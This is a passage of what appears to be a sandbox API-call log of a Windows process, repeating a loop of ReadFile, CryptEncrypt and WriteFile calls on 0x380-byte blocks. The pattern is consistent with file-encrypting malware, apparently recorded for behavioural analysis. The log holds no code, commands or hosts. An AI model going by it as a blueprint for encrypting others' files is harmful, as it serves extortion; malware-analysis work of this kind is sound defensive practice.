hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.552] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.553] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.553] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.554] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.554] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.555] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.555] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.556] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.558] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] 